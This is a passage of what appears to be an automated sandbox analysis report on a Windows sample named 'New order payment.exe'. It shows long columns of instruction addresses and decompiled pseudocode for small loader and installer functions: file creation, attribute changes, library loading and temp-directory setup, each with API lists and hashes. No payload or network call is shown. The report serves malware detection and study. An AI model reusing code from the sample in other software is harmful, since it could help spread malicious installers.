                                                                0x0040619e
                                                                0x0040619e
                                                                0x0040619e
                                                                0x004061a1
                                                                0x004061a4
                                                                0x004061a7
                                                                0x004061ac
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x0040688f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061d4
                                                                0x004061d6
                                                                0x004061d9
                                                                0x0040624a
                                                                0x0040624d
                                                                0x00406250
                                                                0x00406257
                                                                0x00406261
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00406840
                                                                0x004061db
                                                                0x004061df
                                                                0x004061e2
                                                                0x004061e4
                                                                0x004061e7
                                                                0x004061ea
                                                                0x004061ec
                                                                0x004061ef
                                                                0x004061f1
                                                                0x004061f6
                                                                0x004061f9
                                                                0x004061fc
                                                                0x00406200
                                                                0x00406207
                                                                0x0040620a
                                                                0x00406211
                                                                0x00406215
                                                                0x0040621d
                                                                0x0040621d
                                                                0x0040621d
                                                                0x00406217
                                                                0x00406217
                                                                0x00406217
                                                                0x0040620c
                                                                0x0040620c
                                                                0x0040620c
                                                                0x00406221
                                                                0x00406224
                                                                0x00406242
                                                                0x00406244
                                                                0x00000000
                                                                0x00406226
                                                                0x00406226
                                                                0x00406229
                                                                0x0040622c
                                                                0x0040622f
                                                                0x00406231
                                                                0x00406231
                                                                0x00406231
                                                                0x00406234
                                                                0x00406237
                                                                0x00406239
                                                                0x0040623a
                                                                0x0040623d
                                                                0x00000000
                                                                0x0040623d
                                                                0x00000000
                                                                0x00406473
                                                                0x00406477
                                                                0x00406495
                                                                0x00406498
                                                                0x0040649f
                                                                0x004064a2
                                                                0x004064a5
                                                                0x004064a8
                                                                0x004064ab
                                                                0x004064ae
                                                                0x004064b0
                                                                0x004064b7
                                                                0x004064b8
                                                                0x004064ba
                                                                0x004064bd
                                                                0x004064c0
                                                                0x004064c3
                                                                0x004064c3
                                                                0x004064c8
                                                                0x00000000
                                                                0x004064c8
                                                                0x00406479
                                                                0x0040647c
                                                                0x0040647f
                                                                0x00406489
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406520
                                                                0x00406524
                                                                0x00000000
                                                                0x00000000
                                                                0x0040652a
                                                                0x0040652e
                                                                0x00000000
                                                                0x00000000
                                                                0x00406534
                                                                0x00406536
                                                                0x0040653a
                                                                0x0040653a
                                                                0x0040653d
                                                                0x00406541
                                                                0x00000000
                                                                0x00000000
                                                                0x00406591
                                                                0x00406595
                                                                0x0040659c
                                                                0x0040659f
                                                                0x004065a2
                                                                0x004065ac
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00406840
                                                                0x00406597
                                                                0x00000000
                                                                0x00000000
                                                                0x004065b8
                                                                0x004065bc
                                                                0x004065c3
                                                                0x004065c6
                                                                0x004065c9
                                                                0x004065be
                                                                0x004065be
                                                                0x004065be
                                                                0x004065cc
                                                                0x004065cf
                                                                0x004065d2
                                                                0x004065d2
                                                                0x004065d5
                                                                0x004065d8
                                                                0x004065db
                                                                0x004065db
                                                                0x004065de
                                                                0x004065e5
                                                                0x004065ea
                                                                0x00000000
                                                                0x00000000
                                                                0x00406678
                                                                0x00406678
                                                                0x0040667c
                                                                0x00406a1a
                                                                0x00000000
                                                                0x00406a1a
                                                                0x00406682
                                                                0x00406685
                                                                0x00406688
                                                                0x0040668c
                                                                0x0040668f
                                                                0x00406695
                                                                0x00406697
                                                                0x00406697
                                                                0x00406697
                                                                0x0040669a
                                                                0x0040669d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040626d
                                                                0x0040626d
                                                                0x00406271
                                                                0x004069de
                                                                0x00000000
                                                                0x004069de
                                                                0x00406277
                                                                0x0040627a
                                                                0x0040627d
                                                                0x00406281
                                                                0x00406284
                                                                0x0040628a
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628f
                                                                0x00406292
                                                                0x00406292
                                                                0x00406295
                                                                0x00406298
                                                                0x00000000
                                                                0x00000000
                                                                0x0040629e
                                                                0x004062a4
                                                                0x00000000
                                                                0x00000000
                                                                0x004062aa
                                                                0x004062aa
                                                                0x004062ae
                                                                0x004062b1
                                                                0x004062b4
                                                                0x004062b7
                                                                0x004062ba
                                                                0x004062bb
                                                                0x004062be
                                                                0x004062c0
                                                                0x004062c6
                                                                0x004062c9
                                                                0x004062cc
                                                                0x004062cf
                                                                0x004062d2
                                                                0x004062d5
                                                                0x004062d8
                                                                0x004062f4
                                                                0x004062f7
                                                                0x004062fa
                                                                0x004062fd
                                                                0x00406304
                                                                0x00406308
                                                                0x0040630a
                                                                0x0040630e
                                                                0x004062da
                                                                0x004062da
                                                                0x004062de
                                                                0x004062e6
                                                                0x004062eb
                                                                0x004062ed
                                                                0x004062ef
                                                                0x004062ef
                                                                0x00406311
                                                                0x00406318
                                                                0x0040631b
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406326
                                                                0x00406326
                                                                0x0040632a
                                                                0x004069ea
                                                                0x00000000
                                                                0x004069ea
                                                                0x00406330
                                                                0x00406333
                                                                0x00406336
                                                                0x0040633a
                                                                0x0040633d
                                                                0x00406343
                                                                0x00406345
                                                                0x00406345
                                                                0x00406345
                                                                0x00406348
                                                                0x0040634b
                                                                0x0040634b
                                                                0x0040634b
                                                                0x00406351
                                                                0x00000000
                                                                0x00000000
                                                                0x00406353
                                                                0x00406356
                                                                0x00406359
                                                                0x0040635c
                                                                0x0040635f
                                                                0x00406362
                                                                0x00406365
                                                                0x00406368
                                                                0x0040636b
                                                                0x0040636e
                                                                0x00406371
                                                                0x00406389
                                                                0x0040638c
                                                                0x0040638f
                                                                0x00406392
                                                                0x00406392
                                                                0x00406395
                                                                0x00406399
                                                                0x0040639b
                                                                0x00406373
                                                                0x00406373
                                                                0x0040637b
                                                                0x00406380
                                                                0x00406382
                                                                0x00406384
                                                                0x00406384
                                                                0x0040639e
                                                                0x004063a5
                                                                0x004063a8
                                                                0x00000000
                                                                0x004063aa
                                                                0x00000000
                                                                0x004063aa
                                                                0x004063a8
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x00000000
                                                                0x00000000
                                                                0x004063ea
                                                                0x004063ea
                                                                0x004063ee
                                                                0x004069f6
                                                                0x00000000
                                                                0x004069f6
                                                                0x004063f4
                                                                0x004063f7
                                                                0x004063fa
                                                                0x004063fe
                                                                0x00406401
                                                                0x00406407
                                                                0x00406409
                                                                0x00406409
                                                                0x00406409
                                                                0x0040640c
                                                                0x0040640f
                                                                0x0040640f
                                                                0x00406415
                                                                0x004063b3
                                                                0x004063b3
                                                                0x004063b6
                                                                0x00000000
                                                                0x004063b6
                                                                0x00406417
                                                                0x00406417
                                                                0x0040641a
                                                                0x0040641d
                                                                0x00406420
                                                                0x00406423
                                                                0x00406426
                                                                0x00406429
                                                                0x0040642c
                                                                0x0040642f
                                                                0x00406432
                                                                0x00406435
                                                                0x0040644d
                                                                0x00406450
                                                                0x00406453
                                                                0x00406456
                                                                0x00406456
                                                                0x00406459
                                                                0x0040645d
                                                                0x0040645f
                                                                0x00406437
                                                                0x00406437
                                                                0x0040643f
                                                                0x00406444
                                                                0x00406446
                                                                0x00406448
                                                                0x00406448
                                                                0x00406462
                                                                0x00406469
                                                                0x0040646c
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x004066fb
                                                                0x004066fb
                                                                0x004066ff
                                                                0x00406a26
                                                                0x00000000
                                                                0x00406a26
                                                                0x00406705
                                                                0x00406708
                                                                0x0040670b
                                                                0x0040670f
                                                                0x00406712
                                                                0x00406718
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671d
                                                                0x00000000
                                                                0x00000000
                                                                0x004064cb
                                                                0x004064cb
                                                                0x004064ce
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00000000
                                                                0x0040680a
                                                                0x0040680e
                                                                0x00406830
                                                                0x00406833
                                                                0x0040683d
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00406840
                                                                0x00406810
                                                                0x00406813
                                                                0x00406817
                                                                0x0040681a
                                                                0x0040681a
                                                                0x0040681d
                                                                0x00000000
                                                                0x00000000
                                                                0x004068c7
                                                                0x004068cb
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068f0
                                                                0x004068f7
                                                                0x004068fe
                                                                0x004068fe
                                                                0x00000000
                                                                0x004068fe
                                                                0x004068cd
                                                                0x004068d0
                                                                0x004068d3
                                                                0x004068d6
                                                                0x004068dd
                                                                0x00406821
                                                                0x00406821
                                                                0x00406824
                                                                0x00000000
                                                                0x00000000
                                                                0x004069b8
                                                                0x004069bb
                                                                0x004068bc
                                                                0x00000000
                                                                0x00000000
                                                                0x004065f2
                                                                0x004065f4
                                                                0x004065fb
                                                                0x004065fc
                                                                0x004065fe
                                                                0x00406601
                                                                0x00000000
                                                                0x00000000
                                                                0x00406609
                                                                0x0040660c
                                                                0x0040660f
                                                                0x00406611
                                                                0x00406613
                                                                0x00406613
                                                                0x00406614
                                                                0x00406617
                                                                0x0040661e
                                                                0x00406621
                                                                0x0040662f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406905
                                                                0x00406905
                                                                0x00406908
                                                                0x0040690f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406914
                                                                0x00406914
                                                                0x00406918
                                                                0x00406a50
                                                                0x00000000
                                                                0x00406a50
                                                                0x0040691e
                                                                0x00406921
                                                                0x00406924
                                                                0x00406928
                                                                0x0040692b
                                                                0x00406931
                                                                0x00406933
                                                                0x00406933
                                                                0x00406933
                                                                0x00406936
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x0040693c
                                                                0x0040693c
                                                                0x00406940
                                                                0x004069a0
                                                                0x004069a3
                                                                0x004069a8
                                                                0x004069a9
                                                                0x004069ab
                                                                0x004069ad
                                                                0x004069b0
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00000000
                                                                0x004068c2
                                                                0x004068bc
                                                                0x00406942
                                                                0x00406948
                                                                0x0040694b
                                                                0x0040694e
                                                                0x00406951
                                                                0x00406954
                                                                0x00406957
                                                                0x0040695a
                                                                0x0040695d
                                                                0x00406960
                                                                0x00406963
                                                                0x0040697c
                                                                0x0040697f
                                                                0x00406982
                                                                0x00406985
                                                                0x00406989
                                                                0x0040698b
                                                                0x0040698b
                                                                0x0040698c
                                                                0x0040698f
                                                                0x00406965
                                                                0x00406965
                                                                0x0040696d
                                                                0x00406972
                                                                0x00406974
                                                                0x00406977
                                                                0x00406977
                                                                0x00406992
                                                                0x00406999
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x00406637
                                                                0x0040663a
                                                                0x00406670
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a3
                                                                0x004067a3
                                                                0x004067a6
                                                                0x004067a8
                                                                0x00406a32
                                                                0x00000000
                                                                0x00406a32
                                                                0x004067ae
                                                                0x004067b1
                                                                0x00000000
                                                                0x00000000
                                                                0x004067b7
                                                                0x004067bb
                                                                0x004067be
                                                                0x004067be
                                                                0x004067be
                                                                0x00000000
                                                                0x004067be
                                                                0x0040663c
                                                                0x0040663e
                                                                0x00406640
                                                                0x00406642
                                                                0x00406645
                                                                0x00406646
                                                                0x00406648
                                                                0x0040664a
                                                                0x0040664d
                                                                0x00406650
                                                                0x00406666
                                                                0x0040666b
                                                                0x004066a3
                                                                0x004066a3
                                                                0x004066a7
                                                                0x004066d3
                                                                0x004066d5
                                                                0x004066dc
                                                                0x004066df
                                                                0x004066e2
                                                                0x004066e2
                                                                0x004066e7
                                                                0x004066e7
                                                                0x004066e9
                                                                0x004066ec
                                                                0x004066f3
                                                                0x004066f6
                                                                0x00406723
                                                                0x00406723
                                                                0x00406726
                                                                0x00406729
                                                                0x0040679d
                                                                0x0040679d
                                                                0x0040679d
                                                                0x00000000
                                                                0x0040679d
                                                                0x0040672b
                                                                0x00406731
                                                                0x00406734
                                                                0x00406737
                                                                0x0040673a
                                                                0x0040673d
                                                                0x00406740
                                                                0x00406743
                                                                0x00406746
                                                                0x00406749
                                                                0x0040674c
                                                                0x00406765
                                                                0x00406767
                                                                0x0040676a
                                                                0x0040676b
                                                                0x0040676e
                                                                0x00406770
                                                                0x00406773
                                                                0x00406775
                                                                0x00406777
                                                                0x0040677a
                                                                0x0040677c
                                                                0x0040677f
                                                                0x00406783
                                                                0x00406785
                                                                0x00406785
                                                                0x00406786
                                                                0x00406789
                                                                0x0040678c
                                                                0x0040674e
                                                                0x0040674e
                                                                0x00406756
                                                                0x0040675b
                                                                0x0040675d
                                                                0x00406760
                                                                0x00406760
                                                                0x0040678f
                                                                0x00406796
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00000000
                                                                0x00406798
                                                                0x00000000
                                                                0x00406798
                                                                0x00406796
                                                                0x004066a9
                                                                0x004066ac
                                                                0x004066ae
                                                                0x004066b1
                                                                0x004066b4
                                                                0x004066b7
                                                                0x004066b9
                                                                0x004066bc
                                                                0x004066bf
                                                                0x004066bf
                                                                0x004066c2
                                                                0x004066c2
                                                                0x004066c5
                                                                0x004066cc
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x00000000
                                                                0x004066ce
                                                                0x00000000
                                                                0x004066ce
                                                                0x004066cc
                                                                0x00406652
                                                                0x00406655
                                                                0x00406657
                                                                0x0040665a
                                                                0x00000000
                                                                0x00000000
                                                                0x004063b9
                                                                0x004063b9
                                                                0x004063bd
                                                                0x00406a02
                                                                0x00000000
                                                                0x00406a02
                                                                0x004063c3
                                                                0x004063c6
                                                                0x004063c9
                                                                0x004063cc
                                                                0x004063cf
                                                                0x004063d2
                                                                0x004063d5
                                                                0x004063d7
                                                                0x004063da
                                                                0x004063dd
                                                                0x004063e0
                                                                0x004063e2
                                                                0x004063e2
                                                                0x004063e2
                                                                0x00000000
                                                                0x00000000
                                                                0x00406544
                                                                0x00406544
                                                                0x00406548
                                                                0x00406a0e
                                                                0x00000000
                                                                0x00406a0e
                                                                0x0040654e
                                                                0x00406551
                                                                0x00406554
                                                                0x00406557
                                                                0x00406559
                                                                0x00406559
                                                                0x00406559
                                                                0x0040655c
                                                                0x0040655f
                                                                0x00406562
                                                                0x00406565
                                                                0x00406568
                                                                0x0040656b
                                                                0x0040656c
                                                                0x0040656e
                                                                0x0040656e
                                                                0x0040656e
                                                                0x00406571
                                                                0x00406574
                                                                0x00406577
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657d
                                                                0x0040657f
                                                                0x0040657f
                                                                0x00000000
                                                                0x00000000
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c5
                                                                0x00000000
                                                                0x00000000
                                                                0x004067cb
                                                                0x004067ce
                                                                0x004067d1
                                                                0x004067d4
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d9
                                                                0x004067dc
                                                                0x004067df
                                                                0x004067e2
                                                                0x004067e5
                                                                0x004067e8
                                                                0x004067e9
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067ee
                                                                0x004067f1
                                                                0x004067f4
                                                                0x004067f7
                                                                0x004067fa
                                                                0x004067fe
                                                                0x00406800
                                                                0x00406803
                                                                0x00000000
                                                                0x00406805
                                                                0x00406582
                                                                0x00406582
                                                                0x00000000
                                                                0x00406582
                                                                0x00406803
                                                                0x00406a38
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00406a6f
                                                                0x00406a6f
                                                                0x00000000
                                                                0x00406a6f
                                                                0x004068bc
                                                                0x00406843
                                                                0x00406840

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                                                • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 69%
                                                                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f70; // 0x77280c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}












                                                                0x0040138a
                                                                0x004013fa
                                                                0x00401392
                                                                0x0040139b
                                                                0x004013a0
                                                                0x00000000
                                                                0x00000000
                                                                0x004013a2
                                                                0x004013a3
                                                                0x004013ad
                                                                0x00000000
                                                                0x00401404
                                                                0x004013b0
                                                                0x004013b7
                                                                0x004013bd
                                                                0x004013be
                                                                0x004013c0
                                                                0x004013c2
                                                                0x004013b9
                                                                0x004013b9
                                                                0x004013ba
                                                                0x004013ba
                                                                0x004013c9
                                                                0x004013cb
                                                                0x004013f4
                                                                0x004013f4
                                                                0x004013c9
                                                                0x00000000

                                                                APIs
                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                • SendMessageA.USER32 ref: 004013F4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                                • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                                                • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                                • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                0x00405f30
                                                                0x00405f33
                                                                0x00405f3a
                                                                0x00405f42
                                                                0x00405f4e
                                                                0x00000000
                                                                0x00405f55
                                                                0x00405f45
                                                                0x00405f4c
                                                                0x00000000
                                                                0x00405f5d
                                                                0x00000000

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                  • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                                                  • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                                                  • Part of subcall function 00405EBA: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F1E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                • String ID:
                                                                • API String ID: 2547128583-0
                                                                • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                                                • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 68%
                                                                			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                0x00405873
                                                                0x00405880
                                                                0x00405895
                                                                0x0040589b

                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(00000003,00402C95,C:\Users\user\Desktop\New order payment.exe,80000000,00000003), ref: 00405873
                                                                • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: File$AttributesCreate
                                                                • String ID:
                                                                • API String ID: 415043291-0
                                                                • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00405850(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                0x00405854
                                                                0x0040585d
                                                                0x00000000
                                                                0x00405866
                                                                0x0040586c

                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(?,0040565B,?,?,?), ref: 00405854
                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                                                • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                0x004053c9
                                                                0x004053d1
                                                                0x00000000
                                                                0x004053d7
                                                                0x00000000

                                                                APIs
                                                                • CreateDirectoryA.KERNEL32(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                                                • GetLastError.KERNEL32 ref: 004053D7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CreateDirectoryErrorLast
                                                                • String ID:
                                                                • API String ID: 1375471231-0
